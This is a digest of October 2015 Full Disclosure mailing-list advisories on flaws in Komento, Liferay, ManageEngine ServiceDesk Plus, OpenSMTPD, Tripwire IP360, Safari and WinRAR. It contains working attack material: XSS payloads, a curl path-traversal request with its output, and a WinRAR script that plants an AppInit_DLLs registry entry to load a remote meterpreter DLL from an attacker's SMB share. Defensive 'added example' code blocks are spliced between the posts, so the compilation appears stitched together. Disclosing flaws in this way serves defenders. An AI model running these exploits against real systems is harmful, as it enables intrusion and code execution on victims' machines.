[FD] Komento Joomla! component Persistent XSS

2015-10-05 Thread David Sopas
CVE Reference: CVE-2015-7324
Original advisory:
https://www.davidsopas.com/komento-joomla-component-persistent-xss/
Author: David Sopas @dsopas

Komento is a Joomla! comment extension for articles and blogs in K2,
EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.

@http://stackideas.com/komento

I found out that it was possible to launch a Persistent XSS attack when
adding a new comment using the WYSIWYG website and image buttons.
This issue was critical in both environments - frontend and backoffice.

On the frontend, when a user visited a page where the comment has an XSS
attack, they would be automatically affected.
On the other side - the backoffice - when the admin checked the new
comment, they would be vulnerable to this attack and could get their
account hijacked or something even more dangerous.

What I did was to pass along the XSS vector in the [img] code and use
the Javascript onload to run the exploit when the image loads.

Proof-of-concept using [img]:
[img]http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg"; onload="prompt(1)[/img]

Proof-of-concept using [url]:
[url="https://www.davidsopas.com"; onmouseover="prompt(1)"]Your text to link[/url]

In the [img] case this will reflect the following HTML (on the frontend):

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
data-pagespeed-onload="prompt(1)"
alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
onload="prompt(1)" style="max-width:300px;max-height:300px;"
onload="var elem=this;if (this==window)
elem=document.body;elem.setAttribute('data-pagespeed-loaded', 1)"/>

And...

<img src="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
data-pagespeed-onload="prompt(1)"
alt="http://www.robolaranja.com.br/wp-content/uploads/2014/10/Primeira-imagem-do-filme-de-Angry-Birds-%C3%A9-revelada-2.jpg";
onload="prompt(1)" style="max-width:300px;max-height:300px;">

In the administrator area.

This Joomla! component has lots of Google results and can affect a
large number of innocent people. A victim, just by visiting the page
with a malicious comment, will be affected.

All versions prior to 2.0.5 are affected.
The vendor has already patched both security issues in the new version 2.0.5 -
http://stackideas.com/changelog/komento

-David Sopas
davidsopas.com
@dsopas

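As an added example (not from the advisory and not Komento's code), a minimal BBCode renderer that treats the [img] and [url] arguments as URLs instead of raw attribute text, so the two vectors above come out as inert text while plain tags still render. The sample inputs are constructed, with example.test standing in for the advisory's hosts.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample inputs: the two vectors from the advisory (hosts swapped
# for example.test), a javascript: target, and benign tags a renderer must accept.
SAMPLES = {
    "img_vector": '[img]http://example.test/x.jpg" onload="prompt(1)[/img]',
    "url_vector": '[url="https://example.test"; onmouseover="prompt(1)"]Your text to link[/url]',
    "js_scheme": '[url=javascript:prompt(1)]click[/url]',
    "benign_img": '[img]https://example.test/photo.jpg[/img]',
    "benign_url": '[url=https://example.test/page]Read more[/url]',
}

ALLOWED_SCHEMES = {"http", "https"}

# Either tag form: group 1 is the [img] body, groups 2 and 3 the [url] target and text.
TAG_RE = re.compile(r'\[img\](.*?)\[/img\]|\[url=(.*?)\](.*?)\[/url\]', re.I | re.S)


def safe_url(raw):
    """Return the URL if it is a plain http(s) URL, otherwise None.

    The whole argument must survive as one URL: a quote, whitespace or angle
    bracket could close the src/href attribute and start a new one (the bug in
    the advisory), so such input is rejected rather than trusted.
    """
    candidate = raw.strip()
    if len(candidate) >= 2 and candidate[0] == candidate[-1] == '"':
        candidate = candidate[1:-1]              # tolerate [url="..."] quoting
    if re.search(r'[\s"\'<>]', candidate):
        return None
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def _render_tag(m):
    if m.group(1) is not None:                   # [img]...[/img]
        url = safe_url(m.group(1))
        if url is None:
            return html.escape(m.group(0))       # keep the tag visible, as text
        return '<img src="%s" alt="" />' % html.escape(url, quote=True)
    url = safe_url(m.group(2))                   # [url=...]...[/url]
    if url is None:
        return html.escape(m.group(0))
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(m.group(3)))


def bbcode_to_html(text):
    """Render [img] and [url] tags; everything between them is HTML-escaped text."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        out.append(_render_tag(m))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def render_all():
    return {name: bbcode_to_html(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, rendered in render_all().items():
        print("%-11s %s" % (name, rendered))
```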
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Charter Spectrum Business HTTP MITM

2015-10-05 Thread Mark Felder
Hello,

You probably don't need to be told otherwise, but do not trust Charter
(or any ISP) with your HTTP traffic even if you're paying for a business
connection and expect internet without tampering or analysis. I recently
started receiving redirects to a Terms & Conditions page on IPv4 HTTP
traffic. My tests indicate they don't do it with IPv6 through their 6rd
Border Relay and of course they can't do it with HTTPS. Surprisingly
most of my traffic avoids IPv4 HTTP so I am not sure how long this has
been going on.

They insert RST packets and then redirect you to a page to present you
new T&C they want you to accept. The URL looks like this:

http://tandc-browsermessaging.charter.net/?sub=ctgcw67P4wwQS1UWxrkXpw%7CzDWlBWA5zOMe_UlM2CDTNrvyOKhDVmmHD7FsEYdrkAGchiHqZj0U-x7_udYQ1hOM3hHa-exjfm0I0aU0rNGXvOwNLaMhjs6DcqDCqHFaaNPd_oJPhAW98gaC05D_bhpF-mss5gQIkstxEUxEOpezjQ&originalURL=http%3A//seclists.org/fulldisclosure/&ack=24.217.29.129

I've attached a packet dump of this in action.


Stay safe


charter.pcapng
Description: Binary data


[FD] Security vulnerability - Liferay Portal Enterprise Edition

2015-10-05 Thread Tim Schughart
Hey guys,

during a penetration test I found an unknown persistent XSS in the Liferay
Portal backend.

##
#General Information#
##


Manufacturer description:
Liferay Portal is an enterprise-web-platform for the development of business 
solutions, which provides quick results and long-term values.



#Details#

· Product: Liferay Portal Enterprise Edition (6.2 EE SP13)
· Affected versions: All <= 6.2 EE SP13
· Type of attack: Persistent Cross Site Scripting
· Proof Of Concept: Yes, 6.2 EE SP13
· Authentication required: Yes
· Reason: Missing input validation
· Impact: Injection of malicious JavaScript code

##
#PoC#
##
You have to be authenticated in the administrator backend.
Here you have to browse to the control center:
- In configuration click on portal settings
- Select authentication
- Select ldap
- select add server
- input following code in server name

Value for ldap server name field:
Name_of_ldap_serveralert("XSS")

The script is inserted persistently into the configuration page until the LDAP
server is deleted from the database again.

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO | IT Security specialist



ProSec Networks
Website: http://www.prosec-networks.com 
E-Mail: i...@prosec.networks.com 
Phone: +49(0) 2621 9469 252


[FD] ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal

2015-10-05 Thread xistence
Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence 

Product Description
---

ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.


Vulnerability Details
-

The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.

The following example will download the "win.ini" file:

$ curl "http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


Solution


Upgrade to ServiceDesk 9.1 build 9111.


Advisory Timeline
-

07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responded that they will notify their development
team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and
assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure

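As an added example (not ServiceDesk Plus code), the checks a download handler needs so that the fName value above cannot leave the attachment directory: a single URL-decode, rejection of NUL bytes, double-encoding and separators, and a canonical-path containment check. The base directory is a constructed placeholder.

```python
import os
from urllib.parse import unquote

# Constructed placeholder for the directory the download handler may serve from.
BASE_DIR = os.path.realpath("/srv/servicedesk/attachments")

# The fName value from the advisory; decoded once it is ../../../../../../../windows/win.ini\0
ADVISORY_FNAME = "..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00"


class UnsafeFileName(ValueError):
    """Raised when fName must not be used to open a file."""


def resolve_download_path(fname, base_dir=BASE_DIR):
    """Map a client-supplied fName onto a path inside base_dir, or raise."""
    # Decode exactly once. A double-encoded name (..%252f) decodes to ..%2f and is
    # then rejected by the '%' check instead of being decoded a second time.
    name = unquote(fname)
    # %00 is the classic way to cut a path short after a suffix check (for example
    # one that appends an expected extension); the OS call would stop at the NUL.
    if "\x00" in name:
        raise UnsafeFileName("NUL byte in file name")
    if "%" in name:
        raise UnsafeFileName("double-encoded file name")
    # Attachments are bare file names: any separator or dot component is an escape attempt.
    if "/" in name or "\\" in name or name in ("", ".", ".."):
        raise UnsafeFileName("path separator or dot component in file name")
    # Defence in depth: canonicalise and confirm the result still lies under base_dir.
    full = os.path.realpath(os.path.join(base_dir, name))
    if os.path.commonpath([full, base_dir]) != base_dir:
        raise UnsafeFileName("resolved path leaves the base directory")
    return full


def is_safe(fname):
    """True when resolve_download_path would accept fname."""
    try:
        resolve_download_path(fname)
        return True
    except UnsafeFileName:
        return False


if __name__ == "__main__":
    for candidate in (ADVISORY_FNAME, "..%252f..%252fwindows%252fwin.ini", "report.pdf"):
        print("%-60s %s" % (candidate, "accepted" if is_safe(candidate) else "rejected"))
```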


[FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome

2015-10-05 Thread Haifei Li
This is a copied version of my blog post, original version
http://justhaifei1.blogspot.com/2015/10/watch-your-downloads-risk-of-auto.html.

Probably it's commonly known that when you try to download something on your modern
browser, e.g. Google Chrome or Microsoft Edge, the file will be downloaded
automatically to your local system with just a simple click - no need for
additional confirmations. With default settings, the file will be downloaded to
your "Downloads" folder ("C:\Users\\Downloads").
Personally, I have worried about this feature quite a few times; now I finally
got some time to highlight this. (Please tell me if someone has already
talked about this; I quickly googled around and wasn't able to find an
appropriate one. I think it should be known by many people.)

The "auto-download" feature is good from a "user experience" perspective, but
obviously it's not good for security, as the downloading could also be started
by Javascript (). The attacker may just place a malicious DLL
with a specific name into the "Downloads" folder when the victim visits a
webpage the attacker controls. In the future, when the victim tries to download/install
good programs (executables) from legitimate websites - of course, the good
executable will be downloaded, and will be launched from the "Downloads" folder
as well - then the installation/execution process could be hijacked.

This is because, in the real world, most executables rely on DLLs. Anyway,
the "application directory" is the very first place in the search order when
searching for/loading a DLL (you may want to check this paper I released years
ago). So, probably, most DLLs, even the system DLLs, could be hijacked when
you place a same-named DLL in the executable's directory, and that's not only
for the situation where the searched-for DLL isn't anywhere on your system.

Usually, the "Downloads" folder is a place with a massive number of downloaded files, so
the victim probably never gets a chance to realize there is a malicious DLL
sitting in his/her "Downloads" folder. I'd also doubt that even if a normal user
notices a strange DLL in his/her "Downloads" folder, will he/she really
delete it immediately? DLLs won't be executed by themselves anyway, right?

Anyway, in the real world, for most people, who really checks their "Downloads"
folder every time they try to install something from the internet? Instead,
most people just click the "Run" button directly when installing something (see
the following figure).

I have quickly made a video showing this risk. The test environment is Windows 
10 Pro, with Microsoft Edge and Google Chrome, fully updated as of Oct 2nd, 
2015, all with default settings. Check it out here.


As you may have noted, a modified “VERSION.DLL” will be dropped into the 
“Downloads” folder when visiting the webpage 
https://dl.dropboxusercontent.com/u/14747595/auto_download_test/test.html. 
Then, when the user tries to install Adobe Reader from the official adobe.com 
website, the installation process of Adobe Reader will be hijacked - the 
modified “VERSION.DLL” will be loaded and my shellcode will be executed.

There's one small thing: the code execution should run outside the browser
sandbox, but unluckily the test shellcode I copied from the internet runs
calc.exe, and because there's no calc.exe anymore on Windows 10, what you've
seen is just a Calculator App which runs within the App Container sandbox.
Other shellcode, for example running notepad.exe, will run outside the App
Container sandbox and give the attacker control of your system.
#BringTheLovelyCalcBackMicrosoft!

Also note that with default settings, Microsoft Edge will prompt a warning
dialog saying the DLL is dangerous, offering the user an option to delete the
file.

But:
1) Anyway, the DLL has already been dropped into the "Downloads" folder; if the
user chooses not to delete the file or just does nothing, future execution will
still be hijacked.
2) I also guess this Microsoft Edge warning could be bypassed if the DLL is a
signed DLL, but I don't have a certificate to test.
On Google Chrome, as you have seen, there's no warning at all.

Thanks,
Haifei



[FD] Qualys Security Advisory - OpenSMTPD Audit Report

2015-10-05 Thread Qualys Security Advisory
(Sorry for the "CVE-2015-ABCD" place-holders in the report, but
OpenSMTPD's developers were ready with the patches before MITRE was
ready with the CVE-IDs.)


Qualys Security Advisory

OpenSMTPD Audit Report



Contents


Summary
Approach
Local Vulnerabilities
Remote Vulnerabilities
Inter-Process Vulnerabilities
Miscellaneous Bugs
Acknowledgments



Summary


For the past few months, one of our background projects has been to
audit OpenSMTPD, a free implementation of the server-side Simple Mail
Transfer Protocol (SMTP). OpenSMTPD replaces Sendmail as OpenBSD's
default Mail Transfer Agent (MTA) since OpenBSD 5.6, released on
November 1, 2014.

OpenSMTPD was designed to be secure, reliable, performant, and easy to
configure. Indeed, its codebase lives up to OpenBSD's reputation: it is
clean, modular, privilege-separated, and made our audit easy and really
enjoyable. However, the project is pretty much in its infancy (the first
stable version, 5.3, was released on March 17, 2013), which explains why
we discovered various vulnerabilities during our security assessment:

- an oversight in the portable version of fgetln() that allows attackers
  to read and write out-of-bounds memory;

- multiple denial-of-service vulnerabilities that allow local users to
  kill or hang OpenSMTPD;

- a stack-based buffer overflow that allows local users to crash
  OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user;

- a hardlink attack (or race-conditioned symlink attack) that allows
  local users to unset the chflags() of arbitrary files;

- a hardlink attack that allows local users to read the first line of
  arbitrary files (for example, root's hash from /etc/master.passwd);

- a denial-of-service vulnerability that allows remote attackers to fill
  OpenSMTPD's queue or mailbox hard-disk partition;

- an out-of-bounds memory read that allows remote attackers to crash
  OpenSMTPD, or leak information and defeat the ASLR protection;

- a use-after-free vulnerability that allows remote attackers to crash
  OpenSMTPD, or execute arbitrary code as the non-chrooted _smtpd user;

- multiple inter-process vulnerabilities that allow attackers to
  escalate from one (already-compromised) OpenSMTPD process to another.



Approach


The OpenSMTPD version that we audited is available at:

https://www.opensmtpd.org/archives/opensmtpd-5.4.4p1.tar.gz

and is installed by default on OpenBSD's latest release (OpenBSD 5.7,
released on May 1, 2015). Unless otherwise noted, the vulnerabilities
that we discovered in OpenSMTPD 5.4.4p1 affect OpenSMTPD's latest
release as well (OpenSMTPD 5.7.1p1, released on June 30, 2015).

The "hybrid approach" that we adopted to review OpenSMTPD is described
in the bible of code auditing, "The Art of Software Security Assessment"
(by Mark Dowd, John McDonald, and Justin Schuh):

- We started with a "top-down approach" and reviewed the high-level
  information that we gathered on OpenSMTPD: READMEs, manual pages, web
  pages (https://www.opensmtpd.org/presentations/asiabsdcon2013-smtpd/
  and https://www.poolp.org/).

  This approach allowed us to quickly understand OpenSMTPD's design
  (seven privilege-separated, long-running, and event-driven processes
  that communicate through UNIX sockets and the imsg API) and identify
  its attack surface (local, remote, and inter-process entry points).

- We continued with a "bottom-up approach" and reviewed OpenSMTPD's
  implementation: the lowest-level code first (openbsd-compat/ and
  smtpd/mproc.c), followed by the higher-level code.

  This approach allowed us to quickly identify complex vulnerabilities:
  the remote out-of-bounds memory read and use-after-free are actually a
  combination of several low-level and high-level bugs.


Privilege Separation


--[ PROC_PARENT ]---

User: root

Chroot: no

Peers: PROC_CONTROL, PROC_LKA, PROC_QUEUE, PROC_CA, PROC_PONY

PROC_PARENT, the "[priv]" process, spawns the six other long-running
processes at startup (by calling fork_peers() from main()), and the
transient Mail Delivery Agent (MDA) processes on demand (by calling
forkmda() from parent_imsg()).

If any of its long-running children dies, PROC_PARENT calls
parent_shutdown(), kill()s its remaining children, and exit()s, but does
not restart automatically: if we try to exploit a memory corruption, we
have to come up with a one-shot, not a b

[FD] CVE-2015-6237 - Tripwire IP360 VnE Remote Administrative API Authentication Bypass/Privilege Acquisition Vulnerability

2015-10-05 Thread Specto
Document Title

Tripwire IP360 VnE Remote Administrative API Authentication
Bypass/Privilege Acquisition Vulnerability


Affected Products
===
Vendor: Tripwire
Software/Appliance: IP360 VnE Vulnerability Manager
Affected (verified) versions: v7.2.2 -> v7.2.5


CVE
=
CVE-2015-6237


CVSS
===
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/RL:O/RC:C
Base Score: 10.0
Temporal Score: 9.5


Rating
=
Critical


Vulnerability Summary
==

The IP360 VnE is susceptible to a remote XML-RPC authentication
bypass vulnerability, which allows for specially crafted privileged
commands to be remotely executed without authentication. The RPC
service is available on the public HTTPS interface of the VnE by
default, and cannot be disabled.


Impact


Successful exploitation will allow a remote unauthenticated
attacker to execute commands and queries against the API normally
only available to privileged users. Attack vectors include the
ability to enumerate all local/remote users, reset any password of
a user on the system, and manipulate IP filter restrictions for any
user. Users configured to use external authentication sources (e.g.
LDAP) can have a local password created and made usable by an
attacker while the authorized user continues to use external
authentication. The combined vectors could allow for remote
administrative privilege acquisition.


Remediation
=
Update to v7.2.6


Credits
==
This vulnerability was discovered and reported by Specto
(specto [at] custodela [dot] com).


Relevant Timeline


18/08/2015: Initial vendor contact
19/08/2015: Vulnerability provided to vendor
19/08/2015: Vulnerability accepted by vendor
25/08/2015: Vulnerability confirmed by vendor
30/09/2015: Update with vulnerability fix released by vendor
01/10/2015: Advisory posted



Re: [FD] Telegram - Multiple Vulnerabilities

2015-10-05 Thread Uni Sec
Could you be a little more clear with the process for number 5, the account 
hijack and contact import? Isn't intercepting the 5-digit code sufficient to 
gain account takeover?
-J
> Date: Tue, 29 Sep 2015 18:53:52 -0300
> From: edu...@gmail.com
> To: fulldisclosure@seclists.org
> Subject: [FD] Telegram - Multiple Vulnerabilities
> 


> #[5] Hijacking account and importing contacts
> 
> If the victim uses only the passcode as two-step verification, we can reset
> her account, and as a result, the attacker creates the possibility for
> importing contacts and hijacking the account:
> 
> 
> - Attacker asks for token using Telegram-Web
> - Obtains the code
> - Resets account
> - Waits for the victim to log-in
> - Imports contacts (auto)
> - Kills the victim's session
> - Enables Two-Step verification (passcode + email)
> 
> 
> 
> Thanks to:
> 
> Leandro Oliveira
> Joaquim Brasil
> Marcelo Pessoa
> Toronto Garcez
> Tiago Barbosa
> 
> From Tempest Security Intelligence
> 


[FD] Apple Safari URI spoofing (CVE-2015-5764)

2015-10-05 Thread Antonio Sanso
tl;dr Apple Safari for OS X was prone to a URI spoofing vulnerability (and, more
generally, a user interface spoofing). Apple released security updates for Safari
9 on OS X and assigned CVE-2015-5764.
Accidentally this vulnerability was also present in iOS.

Instant demo
In Safari up to 8.0.8 :

  *   go to https://asanso.github.io/CVE-2015-5764/file0.html
  *   click "click me!"
  *   notice the address bar being "data:text/html,%3CH1%3EHi!!%3C/H1%3E"
  *   go back using the browser button
  *   click "click me!"
  *   notice the address bar being http://www.intothesymmetry.com/CVE-2015-5764/file0.php

You can find the details in 
http://intothesymmetry.blogspot.it/2015/09/apple-safari-uri-spoofing-cve-2015-5764.html

regards

antonio




[FD] WinRar Settings Import Command Execution

2015-10-05 Thread Rio Sherri
#!/usr/bin/python3
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
#
# The vulnerability exists in the "Import Settings From File" function.
# Since the settings file of WinRar is saved as a registry file and WinRar
# executes it in an automatic way without checking if it is writing to the
# Registry keys used by WinRar, we can create a specially crafted settings file
# and we can overwrite registry keys.
# Since we have access to the registry there are various ways we could use this
# to get code execution such as defining "RUN" keys or creating new services etc.
# However the best way to get code execution is using AppInit DLLs.
# AppInit DLLs are DLLs that are loaded into any process when it starts.
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor contacted, POC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 on to verify
# presence of [HKEY_CURRENT_USER\Software\WinRAR] or
# [HKEY_CURRENT_USER\Software\WinRAR\
#

banner = r"""
 ___ __  _ _ 
 |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | 
 | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | 
 | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ 
 |___|_| |_|_| \___/ \|\___|_| |_| /_/ \_\_|
"""

print(banner)
print("[+] WinRar Settings Import Command Execution [+]\n")

dll = input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\", "")  # backslashes are removed from the entered path

print("[+] Writing Content To Settings.reg [+]")

# The key path is a raw string so its backslashes reach the .reg file unchanged.
evil = (
    "Windows Registry Editor Version 5.00\n\n"
    + r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]" + "\n"
    + '"AppInit_DLLs"="' + dll + '"\n'
    + '"LoadAppInit_DLLs"=dword:0001\n'
)

print(evil)

with open("Settings.reg", "w") as f:
    f.write(evil)

print("[+] Settings.reg created successfully [+]")
print("\n https://www.infogen.al/ \n")

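As an added example (not WinRAR's code), the kind of check the vendor fix describes: parse the section headers of a .reg file and refuse the import when any key lies outside HKEY_CURRENT_USER\Software\WinRAR. Both settings files are constructed; the first has the shape the script above writes, with a placeholder payload path.

```python
import re

ALLOWED_ROOT = r"HKEY_CURRENT_USER\Software\WinRAR"

# Constructed: the shape of the Settings.reg the script above writes (placeholder payload path).
MALICIOUS_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="\\\\attacker.example\\share\\payload.dll"
"LoadAppInit_DLLs"=dword:00000001
'''

# Constructed: a benign settings export that only touches WinRAR's own keys.
BENIGN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\WinRAR\Interface]
"ShowComment"=dword:00000001

[-HKEY_CURRENT_USER\Software\WinRAR\Profiles\Old]
'''

HEADER_RE = re.compile(r"^(Windows Registry Editor Version 5\.00|REGEDIT4)[ \t]*$", re.M)
# [Key] creates or updates a key, [-Key] deletes it; either way it names the key touched.
SECTION_RE = re.compile(r"^\[(-?)([^\]\r\n]+)\][ \t]*$", re.M)

# regedit only accepts full root names in .reg files; the short forms are
# normalised anyway so a more lenient importer cannot be talked past the check.
ROOT_ALIASES = {
    "HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE", "HKCR": "HKEY_CLASSES_ROOT",
    "HKU": "HKEY_USERS", "HKCC": "HKEY_CURRENT_CONFIG",
}


def normalise_key(key):
    """Canonical form: full root name, backslash separators, no empty components."""
    parts = [p for p in key.strip().replace("/", "\\").split("\\") if p]
    if parts:
        parts[0] = ROOT_ALIASES.get(parts[0].upper(), parts[0])
    return "\\".join(parts)


def key_is_allowed(key, root=ALLOWED_ROOT):
    """True when key is root itself or lies below it (case-insensitive, as the registry is)."""
    k, r = normalise_key(key).lower(), normalise_key(root).lower()
    if ".." in k.split("\\"):
        return False
    return k == r or k.startswith(r + "\\")


def reg_sections(text):
    """Return (is_delete, key) for each [...] header in the file."""
    return [(m.group(1) == "-", m.group(2)) for m in SECTION_RE.finditer(text)]


def validate_settings_file(text, root=ALLOWED_ROOT):
    """Return the keys that must not be imported; an empty list means the file is acceptable."""
    if not HEADER_RE.search(text):
        return ["<missing .reg header>"]
    sections = reg_sections(text)
    if not sections:
        return ["<no registry keys in file>"]
    return [key for _delete, key in sections if not key_is_allowed(key, root)]


if __name__ == "__main__":
    for label, text in (("malicious", MALICIOUS_REG), ("benign", BENIGN_REG)):
        print(label, "->", validate_settings_file(text) or "ok")
```

Exported .reg files are UTF-16LE with a byte-order mark, so decode the bytes before handing the text to validate_settings_file.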


[FD] Persistent XSS - Liferay Portal Enterprise Edition

2015-10-05 Thread Tim Schughart
Hey guys,

during a penetration test I found an unknown persistent XSS in the Liferay
Portal backend.

##
#General Information#
##


Manufacturer description:
Liferay Portal is an enterprise-web-platform for the development of business 
solutions, which provides quick results and long-term values.



#Details#

· Product: Liferay Portal Enterprise Edition (6.2 EE SP13)
· Affected versions: All <= 6.2 EE SP13
· Type of attack: Persistent Cross Site Scripting
· Proof Of Concept: Yes, 6.2 EE SP13
· Authentication required: Yes
· Reason: Missing input validation
· Impact: Injection of malicious JavaScript code

##
#PoC#
##
You have to be authenticated in the administrator backend.
Here you have to browse to the control center:
- In configuration click on portal settings
- Select authentication
- Select ldap
- select add server
- input following code in server name

Value for ldap server name field:
Name_of_ldap_serveralert("XSS")

The script is inserted persistently into the configuration page until the LDAP
server is deleted from the database again.

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO | IT Security specialist



ProSec Networks
Website: http://www.prosec-networks.com 
E-Mail: i...@prosec.networks.com 
Phone: +49(0) 2621 9469 252


Re: [FD] WinRAR SFX v5.21 - Remote Code Execution Vulnerability

2015-10-05 Thread Hernan Moller
In fact, an SFX file can only try to access a specific URL
(the attacker's server). Then the attacker exploits a
Microsoft vulnerability (MS14-064).

The WinRAR file doesn't allow RCE by itself.


--
Hernán Möller
http://nivel4.com


2015-09-28 5:39 GMT-03:00 Gynvael Coldwind :

> Correct me if I'm wrong, but the vulnerability can be summarized as: if you
> run an untrusted .exe you might execute malicious code?
>
> I hardly see this as giving anything new to the attacker who can just
> create a malicious exe file, set the winrar sfx icon and send it to the
> victim.
>
> Keep in mind that not every unexpected behavior or software bug is a
> security vulnerability.
>
> (and no, potential AV bypass doesn't make it a vulnerability either)
>
> Cheers,
> Gynvael
>
> On Mon, 28 Sep 2015 10:27 Vulnerability Lab <
> resea...@vulnerability-lab.com>
> wrote:
>
> > Document Title:
> > ===
> > WinRAR SFX v5.21 - Remote Code Execution Vulnerability
> >
> >
> > References (Source):
> > 
> > http://www.vulnerability-lab.com/get_content.php?id=1608
> >
> > Video: https://www.youtube.com/watch?v=fo0l0oT4468
> >
> >
> > Release Date:
> > =
> > 2015-09-28
> >
> >
> > Vulnerability Laboratory ID (VL-ID):
> > 
> > 1608
> >
> >
> > Common Vulnerability Scoring System:
> > 
> > 9
> >
> >
> > Product & Service Introduction:
> > ===
> > WinRAR with over 500 million users worldwide by far the most popular
> > compression program and therefore the best way to files securely and
> > efficiently to pack for a data transfer to speed up the data transfer via
> > e-mail and secure storage optimized files.
> >
> > (Copy of the Homepage: http://www.win-rar.com/start.html )
> >
> >
> > Abstract Advisory Information:
> > ==
> > An independent vulnerability laboratory researcher discovered a code
> > execution vulnerability in the official WinRAR SFX v5.21 software.
> >
> >
> > Vulnerability Disclosure Timeline:
> > ==
> > 2015-09-28: Public Disclosure (Vulnerability Laboratory)
> >
> >
> > Discovery Status:
> > =
> > Published
> >
> >
> > Exploitation Technique:
> > ===
> > Remote
> >
> >
> > Severity Level:
> > ===
> > Critical
> >
> >
> > Technical Details & Description:
> > 
> > A remote code execution vulnerability has been discovered in the official
> > WinRAR SFX v5.21 software.
> > The vulnerability allows remote attackers to unauthorized execute system
> > specific code to compromise a target system.
> >
> > The issue is located in the `Text and Icon` function of the `Text to
> > display in SFX window` module. Remote attackers are
> > able to generate own compressed archives with malicious payloads to
> > execute system specific codes for compromise. The attackers
> > saved in the sfx archive input the malicious generated html code. Thus
> > results in a system specific code execution when a target
> > user or system is processing to open the compressed archive.
> >
> > The security risk of the code execution vulnerability is estimated as
> > critical with a cvss (common vulnerability scoring system) count of 9.2.
> > Exploitation of the code execution vulnerability requires low user
> > interaction (open file) without privilege system or restricted user
> > accounts.
> > Successful exploitation of the remote code execution vulnerability in the
> > WinRAR SFX software results in system, network or device compromise.
> >
> >
> > Proof of Concept (PoC):
> > ===
> > The code execution vulnerability can be exploited by remote attackers
> > without privilege system user account or user interaction.
> > For security demonstration or to reproduce the vulnerability follow the
> > provided information and steps below to continue.
> >
> > Manual steps to reproduce the vulnerability ...
> > 1.  Run perl code : perl poc.pl
> > 2.  Right Click on any file and select "add to archive..."
> > 3.  Select "Create SFX archive"
> > 4.  Go to the Advanced Menu and select "SFX options..."
> > 5.  Go to the "Text and icon" Menu
